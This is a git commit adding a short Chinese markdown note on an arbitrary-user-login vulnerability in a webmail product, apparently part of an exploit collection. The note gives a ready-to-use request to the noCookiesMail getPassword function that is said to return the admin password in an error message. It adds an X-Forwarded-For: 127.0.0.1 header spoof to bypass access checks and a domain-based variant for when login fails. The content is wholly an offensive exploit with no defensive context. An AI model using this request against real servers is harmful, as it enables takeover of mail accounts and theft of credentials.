Create WEBMAIL存在任意用户登录漏洞.md

2026-03-17 20:34:54 +08:00 · 2023-08-21 21:14:00 +08:00 · 2023-08-21 21:14:00 +08:00 · 1637ac33fb
commit 1637ac33fb
parent a076dda9f5
1 changed files with 11 additions and 0 deletions
--- a/WEBMAIL存在任意用户登录漏洞.md
+++ b/WEBMAIL存在任意用户登录漏洞.md
@ -0,0 +1,11 @@
 ## WEBMAIL存在任意用户登录漏洞
 ```
 RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
 回显errormsg为密码
 用户名为 admin
 添加头 X-Forwarded-For: 127.0.0.1
 如果有登录失败的话，使用
 /RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 登录
 ```